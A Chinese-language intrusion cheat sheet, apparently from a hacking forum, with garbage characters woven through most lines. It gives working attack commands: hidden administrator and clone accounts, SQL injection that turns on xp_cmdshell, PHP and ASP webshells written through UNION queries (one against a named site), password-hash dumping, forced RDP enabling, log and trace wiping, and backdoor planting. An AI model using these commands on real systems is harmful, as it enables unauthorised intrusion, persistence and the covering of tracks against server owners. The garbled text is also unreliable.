; P& A) z& ^/ T4 n' D0 w, h1.net user administrator /passwordreq:no* h; H" L6 c% Q) o
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了$ _) L9 J, K2 t% e. r) \# U+ u
2.比较巧妙的建克隆号的步骤2 F. d& J* f5 V/ L
先建一个user的用户
, l# `2 l" h( T1 j" A" K6 g然后导出注册表。然后在计算机管理里删掉/ d& l' v" P9 z
在导入,在添加为管理员组
9 x* C0 z5 a* C# o7 {! g3.查radmin密码% Y- | g8 V2 R9 y5 U/ D: A4 a
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg) D- U2 P: c7 [4 e/ f1 R" q
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
2 J; L4 S5 S' M8 s/ F* a- L建立一个"services.exe"的项
6 \6 a- u5 t( ]+ C8 ?; K1 d再在其下面建立(字符串值)* _, {- ]* t. _& B3 [
键值为mu ma的全路径; B3 a* L! c8 U+ I0 U
5.runas /user:guest cmd' |8 P+ S, @" G# \
测试用户权限!
- o) ]& | R5 {. K6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
+ M6 y4 g+ Y$ E( q2 e7.入侵后漏洞修补、痕迹清理,后门置放:% s9 _7 @: \7 v1 x* P8 z
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
4 C6 i6 n+ z' m- m: \8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
7 S( G1 N6 ^/ |% m
" @ Q6 U; \6 w: Z6 f$ _; @for example
3 i8 v+ t! S. l0 X2 H7 S7 _
; e8 y/ j% p7 ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
' v+ N% B+ |- Q
7 {' R* O) w1 @' Vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add', \( C; |4 }4 j) h" m d+ d
* B9 J3 C; {" F5 P
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了/ C3 {8 u4 |4 y6 ?/ h
如果要启用的话就必须把他加到高级用户模式3 m# V" G! _+ ^4 s1 _; A: q
可以直接在注入点那里直接注入% ^" _; h! V# ]0 ^% _
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--- C" R2 E2 [" h; K
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
6 V/ a* \5 d5 a7 A& D$ M% ^% [- _或者
% u% }7 P4 s0 v* {% ksp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'5 C9 Y( [& k5 I9 Z6 N, s
来恢复cmdshell。
" R/ q/ D7 [, x! J# B- p c/ F
: l% I/ ~, M# u. h4 X1 s分析器! a( w! s6 h& F) x: A8 |+ z+ a
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--9 u7 K7 g: a p! d$ D8 `$ L" `
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
2 B% N1 T$ m3 ^3 Z; @0 c10.xp_cmdshell新的恢复办法
" @# [. g4 H: K! }# \* vxp_cmdshell新的恢复办法% \- p5 Y3 o% k8 a8 Z3 R
扩展储存过程被删除以后可以有很简单的办法恢复:4 \1 T0 E, V/ v# ?
删除
9 T9 C7 Q; O P( W, S8 g0 mdrop procedure sp_addextendedproc \7 G- N; N, l; K+ ^+ Z
drop procedure sp_oacreate1 o3 x# J' S/ [" Y4 Q( K
exec sp_dropextendedproc 'xp_cmdshell'
2 c. ]- C+ A: @; T$ H$ S' C1 X3 r' l" n4 z( B' O- `
恢复
* L* T. q9 d8 z3 [7 Gdbcc addextendedproc ("sp_oacreate","odsole70.dll")1 P" \1 `) Z( S5 S# m
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
5 y: I: U, T, c$ J9 b
3 ` V0 v& A6 n2 r8 z/ r; @这样可以直接恢复,不用去管sp_addextendedproc是不是存在
; z- V: ?2 L4 ^% h; f- V" u' L5 c9 T* [/ _# ~( U* g* P
-----------------------------0 `+ d, g! S- Q0 R* O( G+ S( e
3 X+ A1 m# `% F; h删除扩展存储过过程xp_cmdshell的语句:
0 c2 X5 M8 l+ [/ f8 J' q* Jexec sp_dropextendedproc 'xp_cmdshell'
0 l" @: ~$ I2 ~, @+ P
* f( K h0 y4 L: V. K$ T+ u恢复cmdshell的sql语句; ~) }8 X& J$ J1 {# Y
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
6 v; O5 T7 B& o4 R2 x9 f/ ]* v" H! R, H5 W& m. `" c8 Z
) ]* `5 l2 r0 h3 ~2 L: ?7 o& x开启cmdshell的sql语句
; Z* p6 K$ J0 E3 x b+ c0 O1 H" q5 x3 b
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 v$ E! N8 I; R5 r, `9 Q
0 Z: `5 c& B# i+ x+ p# W; f! b判断存储扩展是否存在* E& T9 ?- z- Z/ b5 I
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'7 i1 g) u$ @) g$ N
返回结果为1就ok
& n" F& p0 Z# @/ U/ l2 z; G/ x7 p- Q* T/ S. j7 k# p; T
恢复xp_cmdshell! Z" i0 d$ U8 [9 {# |8 o
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: y# T- R/ k4 C9 E+ j6 c9 a4 a返回结果为1就ok! e/ L3 a! @3 j3 ]: M
$ J# I% U' d0 Y) u5 K" f否则上传xplog7.0.dll7 q* E+ y# M4 b; x9 U
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'# h( B. Y$ {- L' R% Z5 _
6 x6 N' o3 V( J8 t( {9 w, \0 \
堵上cmdshell的sql语句1 R+ a1 F! o5 V! R* ]( ]
sp_dropextendedproc "xp_cmdshel" e k( E+ b5 o! N
-------------------------
" I$ g, X6 ?" u' M% y9 U清除3389的登录记录用一条系统自带的命令:- j7 b: q4 d% q
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
; U7 s! i; u+ t' d1 s( l9 r/ X$ x5 [- p5 x; w8 k9 h
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件. L' N1 Y! U3 W' [
在 mysql里查看当前用户的权限$ P V I6 O4 v4 F) J% Z" u
show grants for ; d. \2 {$ f5 `# F! V
. g9 r. j! W6 S# E- K
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。. t' ^% P; p" E- u P9 ]. o+ ~
v* D2 v, X% _2 h% n1 u
9 C A, q) Q7 L: RCreate USER 'itpro'@'%' IDENTIFIED BY '123';
' Y/ d6 m7 y& e( y9 R* n3 L! r0 X- w) G Y5 Z5 x% q- n. k
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
; \+ N# u6 }& x7 y+ @9 k4 G% y
7 T+ p; Z" f, G2 y9 H3 UMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
, V. k# _+ u1 \9 _$ g; `: d
* ~) w9 o' r& N. DMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;1 E# b( ]: C8 t0 g
# d0 v9 K* T! O+ w
搞完事记得删除脚印哟。
& f' H4 U2 W+ W+ l* |" L* N- r) B
+ `6 H# ?9 j. @( [2 GDrop USER 'itpro'@'%';
" ~& p; l2 y, ^4 Y `& q" X; \0 L& k( F" `8 {) n/ a
Drop DATABASE IF EXISTS `itpro` ;; r" v& J' {# m" ~ ?$ a' a
& R. D3 |: z6 i7 _1 j
当前用户获取system权限1 u/ E' n# I0 H6 m& T5 s+ J; V
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact6 O6 V" |' D8 I6 J4 c ?
sc start SuperCMD7 n0 j% s' u% y; `# i7 O
程序代码
+ w2 y! P" I9 R3 x5 Z5 i" i/ U l<SCRIPT LANGUAGE="VBScript">
- {2 V5 F" C. d4 k6 J& E6 S2 tset wsnetwork=CreateObject("WSCRIPT.NETWORK"); b- }2 |% v1 q' K
os="WinNT://"&wsnetwork.ComputerName& v$ e1 l' N# J' w( a% c3 i/ J7 i
Set ob=GetObject(os), d2 P" l+ ~: ]2 n8 N+ j- A
Set oe=GetObject(os&"/Administrators,group")
9 t' p/ d# U" P. HSet od=ob.Create("user","nosec")+ Z9 s( d4 n" [
od.SetPassword "123456abc!@#"+ }$ N" `$ V/ C/ `/ A
od.SetInfo
+ o: P. Y; G' s, RSet of=GetObject(os&"/nosec",user)
# Z4 Y% c" S* z7 h+ ?- G% x5 Eoe.add os&"/nosec"
% h" Z3 S+ H6 {% Q4 ^1 y' p</Script>
, n y* u, D, v3 A% f- ?* Q<script language=javascript>window.close();</script>
u# ]8 }1 h6 G
/ S0 S1 K ~- `
# p- g4 _' [8 ~! |% s' f) \1 l0 |1 ?5 B/ b+ e3 W
% q l* k0 A2 I' }: l* v
突破验证码限制入后台拿shell: X7 }! u. p" v; |3 }) U
程序代码
0 D8 s0 t& G/ m" P* x: y* rREGEDIT4
4 G" l; v+ r1 u[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
( D; h3 z( R, k' i9 F' W"BlockXBM"=dword:00000000
# z7 U6 H; D+ m d8 y& x$ F" q
4 M- T* o5 z2 h保存为code.reg,导入注册表,重器IE) _; c1 p5 w' _6 Y/ H' {3 }
就可以了$ U; E2 D8 W8 Z* V) O
union写马
, d% f6 N" C) h- V) R9 X& Q程序代码0 G8 w1 T. m, U3 f7 O
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
" t6 p; x; X) z% H" Y; s* r/ |+ Z/ { B1 ]
应用在dedecms注射漏洞上,无后台写马
; f) q5 X4 s, p8 {* mdedecms后台,无文件管理器,没有outfile权限的时候
8 e5 M( F" s5 j. O* `在插件管理-病毒扫描里0 `1 G1 P5 O* s- @; g& N% S
写一句话进include/config_hand.php里0 N# I( s- j% o; C
程序代码
- V& y6 b, x! W3 c6 I% M* J f2 V>';?><?php @eval($_POST[cmd]);?>
9 v m, q2 i4 {
5 x. K# X- ~+ u0 ~7 d: F% F3 L1 }7 V) m
如上格式/ j1 p2 A! f6 C; ?+ U) w, w
9 W" o& L, _" X) L% C+ B
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解2 ?# a, I' W4 l& f9 N
程序代码
) x$ D! l7 S* @8 h% Fselect username,password from dba_users;
4 l7 R3 J, t2 Y/ j6 ]1 e0 \% g+ _1 t' V
) V2 w9 w/ n8 l, y+ S' ]( y
mysql远程连接用户7 B7 u: K, f ?# I9 W
程序代码4 H; M# M7 [4 }) I+ K/ l
; G/ w- O W/ d0 O# U) [
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme'; L2 r9 n4 W/ z
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
$ ~; ]* h" w6 b: P$ C0 wMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 06 L+ C3 x5 h! B; n$ m9 Z! V9 Z2 r. ^
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;% w0 M$ x" Y. H( v& p |: l3 |- {
/ g) I. k: c. A3 _. k; v! l5 J5 P+ L
& j. J2 R: P6 p; {% y9 S
. j9 \1 ~5 \* ?) a$ k' Q1 v/ u2 {; ^/ c& ~7 J( W
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 d' B! Y5 h i. [0 ^( r' d
, p3 U- a' p2 W' p. M1.查询终端端口9 U3 x& j! s- e' Z' m
5 H8 G( f2 W$ f6 X' u& L% [
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
5 H/ C/ a( g- r& B: z* U# y" D+ d) s5 W
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
5 d* m5 y5 L* Y: V% dtype tsp.reg
% i' U# h2 E; `* j! {/ U8 j1 g# M1 K5 ~9 B- U2 w4 c k/ R% y
2.开启XP&2003终端服务
9 T6 Q! F+ d( C" ^* j l b5 _1 c6 p- o1 o! |0 r
6 W: Q$ N3 t: V. R5 M( E
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f+ ]; ^9 l; Y! O4 W, P4 [- N
! u- u" K/ A! R% E8 e/ t- G7 O) n, K
8 |( m: F* H4 P9 XREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
* `1 R) v4 t+ y( X- B2 @1 Z0 G4 i5 Y$ D% |- p! M
3.更改终端端口为20008(0x4E28)) W4 p5 ^& g8 \
- G/ i K: c1 A% T; |! a% I( L# o
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
. W1 r7 B: T9 V0 d3 ]7 G8 b
" S, R2 X; m# Y, `, @& |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f7 k: O) R( D& J/ l
: X5 {9 p: M- L: L
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制" I- d0 ?. Q) W5 l3 G; Q( ]$ \
h% w$ O4 g) [3 @, r9 [
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f$ h+ m8 h" e+ m% P
) O! `- t) V5 s; p
' l- Y+ M2 E1 M7 y- ~/ U. r4 H8 F `2 D5 M+ T5.开启Win2000的终端,端口为3389(需重启)+ `- d; v" K- p- E* y3 ^7 Y" W
0 h& o7 T3 i: @, ]( y/ T& N
echo Windows Registry Editor Version 5.00 >2000.reg 5 J! q6 L( ^7 V& w
echo. >>2000.reg- S0 @& u' i( q* K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg : M6 x! {# G# c
echo "Enabled"="0" >>2000.reg
" Z, J2 H: M7 x+ R# h0 Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
8 _, t$ ^. M% H2 Z) D" n+ B/ M! Pecho "ShutdownWithoutLogon"="0" >>2000.reg
' b* P: d* ~3 r) l! S$ }, e, Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg * R$ U) W8 P. B5 z7 N2 r! H
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
' E7 F4 `; _& e* ~3 x9 c# iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
' A1 h' u9 @/ b+ F" c) r$ yecho "TSEnabled"=dword:00000001 >>2000.reg / t" N' ] s \" B' n) w* M8 v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
& n+ n' P/ N/ T, N2 j& W4 {echo "Start"=dword:00000002 >>2000.reg
4 n1 g: X- x" m5 r* @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 3 w$ e# }' I; ~% P" g
echo "Start"=dword:00000002 >>2000.reg
; v2 D8 v4 b6 \$ lecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
! h0 w( h$ L. C" N; O1 k8 d" secho "Hotkey"="1" >>2000.reg
% G. `' a' w* z; n8 ?$ _0 q3 k/ hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
8 ]$ ?0 Y* R. Q2 q+ necho "ortNumber"=dword:00000D3D >>2000.reg
4 m* u2 o2 J4 d7 f* M: fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg * a, J* L7 V2 a) Q1 N
echo "ortNumber"=dword:00000D3D >>2000.reg
- I9 `2 R# q4 k4 h5 d0 n4 E. b {; g9 S# R$ Z
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)4 Y0 Q* t9 m0 r* s2 T
) `2 U4 L# [' E% E+ \" Z
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
+ }( v! K2 d z& U(set inf=InstallHinfSection DefaultInstall)
5 R7 [1 G; u) d9 Xecho signature=$chicago$ >> restart.inf. m0 \- U5 Y$ `# w2 F
echo [defaultinstall] >> restart.inf; d$ V' _" m: d/ G+ [
rundll32 setupapi,%inf% 1 %temp%\restart.inf% g9 }" |0 E. F g8 O
5 F, W& j G! b/ I5 u
" D7 s5 O4 T. y% N; a3 a$ L
7.禁用TCP/IP端口筛选 (需重启) f" q( V. c9 Y& h3 f0 L9 Q2 f
9 W$ {& L9 U9 ?0 X$ C! k
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
6 M# u& T* u. s( @' F2 w. N& v* ?8 O F6 g: E# j
8.终端超出最大连接数时可用下面的命令来连接
5 U$ w( y4 D2 g/ k* V; x
: A$ U; s- q6 k/ j4 }$ M! umstsc /v:ip:3389 /console, o1 ~( W- A p$ `! |
6 E1 k5 R% [6 Q5 R
9.调整NTFS分区权限
& A- {+ @5 L |. l$ J8 _% _4 `, j) j) ?( ]
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利), W- K3 a/ q6 P/ \
- [8 m j w" D7 W$ j2 ccacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)- {; }2 K5 G1 C: [8 N5 F" P& h! R& Q
* y* F. u, \# q8 d/ I& {. b------------------------------------------------------8 ?% @1 i6 L3 G [2 E5 n5 X0 [
3389.vbs 3 s8 n, `/ o4 t- H* r
On Error Resume Next y* ?& M' ~" P# I: \2 q
const HKEY_LOCAL_MACHINE = &H80000002
+ Y) {1 _( W* O6 Z- b+ jstrComputer = "."; {" s) H( A4 q0 X5 @
Set StdOut = WScript.StdOut# N& G! M" q- y# {$ y
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
7 ^% r! _9 [' j8 l6 \ PstrComputer & "\root\default:StdRegProv")
; A( f8 L7 X" L- KstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"3 Z# I% P6 |6 Z" z3 H
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; d4 x# l8 `" q! R- RstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
, L" ~% h0 ?% n1 foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath- v$ T N1 z- \9 x( r) ?2 M0 G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
/ ], Z! h) _" U4 ]# TstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"( s1 z; C; c% D: M, Y
strValueName = "fDenyTSConnections"
?8 x) M1 p3 y% l, l% udwValue = 0
& i0 X8 ?& w) ]; c0 L) ?% a3 _oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- t2 @+ N1 N" z7 o N6 astrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"$ J/ W+ O' U4 U! X* S! o" j5 j6 t
strValueName = "ortNumber"
p; F" k5 P6 u, j, hdwValue = 3389
; q0 Z8 U, e0 v4 h$ k: B6 Goreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# z' x% c) D5 b. `6 U! ]0 ^strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 u8 z4 n4 o9 Z" h& A qstrValueName = "ortNumber"* Q6 w3 V5 L7 r0 h+ l- d4 F
dwValue = 3389- O8 F# x$ Y. J2 \% r; ]( X1 x
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- D2 v4 o; _ x1 Q' YSet R = CreateObject("WScript.Shell") , l$ z9 b! y9 Z6 N
R.run("Shutdown.exe -f -r -t 0") 5 v. L5 g7 a# o) i
6 j" O$ ? C* V" X* J- S$ |2 j1 `$ a删除awgina.dll的注册表键值
" N3 G( s& r: Y- h& [1 x程序代码% n* x3 {& ^- s7 K5 ]5 @ s e6 @
' `( d2 r9 u2 @5 n7 a
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f6 J- c7 h( f h+ A
3 ]0 l& H* r2 Q! o- N8 W: O5 y9 l( ^
( k) f7 M3 J& x2 n2 @, _5 J; J; P; Z2 o5 u
! S. J2 N$ m5 X' N
程序代码
8 m9 N2 {" k, E' l% ]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
7 @! H( o( Z" s+ y6 x
4 j5 C( \, v8 H! D# b& R( {设置为1,关闭LM Hash
) x2 |4 n6 N. p2 f- E! m4 Z2 G
& d t+ D+ J$ o' @1 K& ]% v数据库安全:入侵Oracle数据库常用操作命令7 }! H! [8 x/ { n
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
2 T' X f1 g" _% x1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。9 E$ v7 Q3 U6 m4 p4 n# A
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
1 ?) q2 Z) [& P0 }3、SQL>connect / as sysdba ;(as sysoper)或
' {5 W$ ~4 C* H* }% xconnect internal/oracle AS SYSDBA ;(scott/tiger)
( ]2 M' a3 B9 n$ X" x, g$ n: a% lconn sys/change_on_install as sysdba;
4 m h0 V' H% m4 z# U0 s: \4、SQL>startup; 启动数据库实例- H2 U& N" _: u6 U
5、查看当前的所有数据库: select * from v$database;
. b1 ^! d& X4 ?6 m: s: zselect name from v$database;* s+ i: r& r% A3 ] j, M: A j
6、desc v$databases; 查看数据库结构字段* m6 l' f P. g
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:( F7 S. B q4 Z7 G3 _, n
SQL>select * from V_$PWFILE_USERS;
6 U! d; ^7 U2 l2 r- L; bShow user;查看当前数据库连接用户. y; L0 ^2 T4 y: N1 k h8 P1 b+ u
8、进入test数据库:database test;9 F E# e. o4 L/ C* P4 \! D
9、查看所有的数据库实例:select * from v$instance;
# [$ }, f4 T) L& ^: y9 c如:ora9i
& q$ K S$ ~9 Y" q; K10、查看当前库的所有数据表:
+ E, E8 P0 K* ~1 t# k D! ySQL> select TABLE_NAME from all_tables;
2 ]$ o6 x+ q0 A5 Fselect * from all_tables;
. L6 G& ^: |& d- W/ eSQL> select table_name from all_tables where table_name like '%u%';9 E+ n4 ^* P$ Y! U0 q6 O) r2 J
TABLE_NAME
/ t/ M4 c3 V: g! v% v------------------------------1 D; ^ M* I" [7 i
_default_auditing_options_
0 j* L$ t4 k3 B) D& m. p( o11、查看表结构:desc all_tables;
% ?9 ]: m, p7 Y' a1 m12、显示CQI.T_BBS_XUSER的所有字段结构:6 n% E" J8 ?" s2 s, D! p& {
desc CQI.T_BBS_XUSER;
, ^0 a! P6 l1 F2 V1 P13、获得CQI.T_BBS_XUSER表中的记录:; D1 p" f. R! A) M' Z4 }. w; y
select * from CQI.T_BBS_XUSER;
) d+ \# b/ y& A+ q3 c+ X6 D14、增加数据库用户:(test11/test)5 @& D9 o1 ?6 M0 }: \6 Y- v
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;! f% e$ R4 Y% b6 ?9 K2 t" [# e, Z" {/ k
15、用户授权:
5 e ? E! m" A! Kgrant connect,resource,dba to test11; T5 w; \2 h, _# \6 k3 _9 e5 V
grant sysdba to test11;$ u6 a3 F' s6 h" m
commit;+ H9 M1 F1 o& F0 G7 o. b0 `
16、更改数据库用户的密码:(将sys与system的密码改为test.)
) m" y: U4 X* z: W8 A" d* |alter user sys indentified by test;. z2 [0 R; D* m2 y/ O# l& ?
alter user system indentified by test;
. x3 f9 f# k2 Q' ?# ]! a6 H; }( B/ G+ |
applicationContext-util.xml
. E r: |* ]1 p) |, ]/ {applicationContext.xml3 k# l- j) Q- p, w5 S
struts-config.xml
7 ~7 x4 d0 n d6 jweb.xml
, A0 c6 s: c% tserver.xml
2 P$ h6 T2 Y: u" S% d: Ptomcat-users.xml
8 N3 }. _5 y) S1 s1 M' ], [hibernate.cfg.xml( ]1 j B9 n& |
database_pool_config.xml
4 c4 F/ s' a# ?1 P3 E7 K1 S- W
5 R3 A, K4 o, C8 }# d/ U1 Z! n l. {6 q! I8 X/ _/ D
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置0 {+ A' @6 y" k) P
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
; E* j' b: r" W" W0 R3 V2 S\WEB-INF\struts-config.xml 文件目录结构0 k) d4 t1 e7 Q4 K8 X/ \$ M
1 G! }6 t+ i% `spring.properties 里边包含hibernate.cfg.xml的名称
( R5 Y9 z4 ~$ N* l( a& j7 V* U0 o7 t8 A6 U$ X% S
+ L" j3 ]7 H5 q0 b$ L% b
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml: }3 e, q7 D( {
! A, H- Q8 P# S* U, v! u
如果都找不到 那就看看class文件吧。。- {* d/ I+ C7 h+ ~! Q, i* O
# C& Z. [" V2 \" _( @
测试1:
5 I: P# ~0 @1 z* |/ E8 c G. S" KSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
* g4 b: F8 G$ z. h* a# \, t4 Q
* p; r' r3 |0 z: P0 c测试2:
9 t, ^# |! R5 }' ^) q2 V/ O: M" V5 i' s. S0 C/ I2 y
create table dirs(paths varchar(100),paths1 varchar(100), id int)
T, Z8 A# I B+ |6 P k- j3 u1 {8 @; @+ _% I
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, b! g* P5 ?. H3 t# j& t& l& T
; o Z7 n, n$ ^* t( BSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t14 G: u( g: R* r: `! F
+ k1 K, E" e0 r+ i查看虚拟机中的共享文件:' O! D: T! a1 z) F' o7 a0 x) B
在虚拟机中的cmd中执行
% t, \$ z$ u/ I( u4 ~\\.host\Shared Folders; l8 g6 P+ G$ X: K/ C
) }% Q; |9 u2 H' C) v9 ^; A/ Ucmdshell下找终端的技巧1 o: A, M: f2 e4 W
找终端:
) _0 c9 w8 a1 z# p' d P" z2 u0 [第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
( C4 `* ^& j$ c1 _1 E" n+ W 而终端所对应的服务名为:TermService 2 G& u5 g5 x4 S; R: F, J; _" i# y; b
第二步:用netstat -ano命令,列出所有端口对应的PID值! 0 G- ^! ^. u/ U" Z# i" U( v
找到PID值所对应的端口
$ h+ b9 @1 @# s; z- g% Y( A$ a# c; e) v1 ]6 Q6 V
查询sql server 2005中的密码hash
1 @- S) p1 ~ R9 zSELECT password_hash FROM sys.sql_logins where name='sa'
* R6 T& G3 `6 ?0 V6 d1 [SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
